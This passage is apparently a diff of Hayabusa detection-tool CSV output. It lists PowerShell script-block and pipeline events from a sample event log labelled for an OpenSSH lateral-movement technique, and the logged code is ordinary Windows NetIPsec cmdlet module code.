+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if 